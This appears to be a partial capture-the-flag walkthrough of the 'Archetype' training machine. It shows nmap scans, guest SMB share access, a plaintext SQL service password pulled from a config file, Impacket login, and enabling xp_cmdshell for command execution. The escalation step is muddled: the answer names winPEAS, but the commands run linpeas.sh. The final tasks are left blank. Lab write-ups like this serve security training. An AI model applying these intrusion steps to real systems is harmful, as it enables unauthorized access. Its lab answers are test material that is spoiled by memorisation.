Archetype

Task #1: Which TCP port is hosting a database server?

  • A: 1433

  • nmap -sC -sV 10.129.186.221

    Nmap scan report for 10.129.186.221
    Host is up (0.035s latency).
    Not shown: 996 closed ports
    PORT     STATE SERVICE      VERSION
    135/tcp  open  msrpc        Microsoft Windows RPC
    139/tcp  open  netbios-ssn  Microsoft Windows netbios-ssn
    445/tcp  open  microsoft-ds Windows Server 2019 Standard 17763 microsoft-ds
    1433/tcp open  ms-sql-s     Microsoft SQL Server 2017 14.00.1000.00; RTM
    | ms-sql-ntlm-info:
    |   Target_Name: ARCHETYPE
    |   NetBIOS_Domain_Name: ARCHETYPE
    |   NetBIOS_Computer_Name: ARCHETYPE
    |   DNS_Domain_Name: Archetype
    |   DNS_Computer_Name: Archetype
    |_  Product_Version: 10.0.17763
    | ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
    | Not valid before: 2022-12-21T21:43:52
    |_Not valid after:  2052-12-21T21:43:52
    |_ssl-date: 2022-12-21T21:44:51+00:00; 0s from scanner time.
    Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows
    
    Host script results:
    |_clock-skew: mean: 1h36m00s, deviation: 3h34m41s, median: 0s
    | ms-sql-info:
    |   10.129.186.221:1433:
    |     Version:
    |       name: Microsoft SQL Server 2017 RTM
    |       number: 14.00.1000.00
    |       Product: Microsoft SQL Server 2017
    |       Service pack level: RTM
    |       Post-SP patches applied: false
    |_    TCP port: 1433
    | smb-os-discovery:
    |   OS: Windows Server 2019 Standard 17763 (Windows Server 2019 Standard 6.3)
    |   Computer name: Archetype
    |   NetBIOS computer name: ARCHETYPE\x00
    |   Workgroup: WORKGROUP\x00
    |_  System time: 2022-12-21T13:44:44-08:00
    | smb-security-mode:
    |   account_used: guest
    |   authentication_level: user
    |   challenge_response: supported
    |_  message_signing: disabled (dangerous, but default)
    | smb2-security-mode:
    |   2.02:
    |_    Message signing enabled but not required
    | smb2-time:
    |   date: 2022-12-21T21:44:42
    |_  start_date: N/A
    

Task #2: What is the name of the non-Administrative share available over SMB?

  • A: backups

  • nmap -p 445 --script smb-enum-shares.nse 10.129.186.221

    PORT    STATE SERVICE
    445/tcp open  microsoft-ds
    
    Host script results:
    | smb-enum-shares:
    |   account_used: guest
    |   \\10.129.186.221\ADMIN$:
    |     Type: STYPE_DISKTREE_HIDDEN
    |     Comment: Remote Admin
    |     Anonymous access: <none>
    |     Current user access: <none>
    |   \\10.129.186.221\C$:
    |     Type: STYPE_DISKTREE_HIDDEN
    |     Comment: Default share
    |     Anonymous access: <none>
    |     Current user access: <none>
    |   \\10.129.186.221\IPC$:
    |     Type: STYPE_IPC_HIDDEN
    |     Comment: Remote IPC
    |     Anonymous access: READ/WRITE
    |     Current user access: READ/WRITE
    |   \\10.129.186.221\backups:
    |     Type: STYPE_DISKTREE
    |     Comment:
    |     Anonymous access: READ
    |_    Current user access: READ
    

Task #3: What is the password identified in the file on the SMB share?

  • A: M3g4c0rp123

  • smbclient //10.129.186.221/backups -U guest to connect to the share

    smb: \> ls
      .                                   D        0  Mon Jan 20 07:20:57 2020
      ..                                  D        0  Mon Jan 20 07:20:57 2020
      prod.dtsConfig                     AR      609  Mon Jan 20 07:23:02 2020
    
      5056511 blocks of size 4096. 2609339 blocks available
    smb: \> get prod.dtsConfig
    getting file \prod.dtsConfig of size 609 as prod.dtsConfig (2.7 KiloBytes/sec) (average 2.7 KiloBytes/sec)
    smb: \> exit
    
  • cat prod.dtsConfig to view the file

    <DTSConfiguration>
      <DTSConfigurationHeading>
        <DTSConfigurationFileInfo GeneratedBy="..." GeneratedFromPackageName="..." GeneratedFromPackageID="..." GeneratedDate="20.1.2019 10:01:34"/>
      </DTSConfigurationHeading>
      <Configuration ConfiguredType="Property" Path="\Package.Connections[Destination].Properties[ConnectionString]" ValueType="String">
        <ConfiguredValue>Data Source=.;Password=M3g4c0rp123;User ID=ARCHETYPE\sql_svc;Initial Catalog=Catalog;Provider=SQLNCLI10.1;Persist Security Info=True;Auto Translate=False;</ConfiguredValue>
      </Configuration>
    </DTSConfiguration>
    

Task #4: What script from Impacket collection can be used in order to establish an authenticated connection to a Microsoft SQL Server?

  • A: mssqlclient.py
  • wget https://github.com/fortra/impacket/releases/download/impacket_0_10_0/impacket-0.10.0.tar.gz to download the impacket library
  • tar -xvf impacket-0.10.0.tar.gz to extract the impacket library, then rm impacket-0.10.0.tar.gz to remove the
  • cd impacket-0.10.0, then python3 -m pip install . to install the library and the example scripts
  • python3 examples/mssqlclient.py ARCHETYPE/sql_svc@10.129.186.221 -windows-auth, then enter the password from above when prompted

Task #5: What extended stored procedure of Microsoft SQL Server can be used in order to spawn a Windows command shell?

  • A: xp_cmdshell
  • We need to enable xp_cmdshell first, then we can use it to spawn a shell
  • EXEC sp_configure 'show advanced options', 1; RECONFIGURE; to enable advanced options
  • EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE; to enable xp_cmdshell
  • xp_cmdshell dir c:\ to list the contents of the C drive

Task #6: What script can be used in order to search possible paths to escalate privileges on Windows hosts?

  • A: winPEAS
  • wget https://github.com/carlospolop/PEASS-ng/releases/download/20221218/linpeas.sh to download the script
  • bash ./linpeas.sh to run the script

Task #7: What file contains the administrator's password?

  • A: ``

Task #8: Submit user flag

  • A: ``

Task #9: Submit root flag

  • A: ``

Tags

  1. impacket (Private)
  2. smb (Private)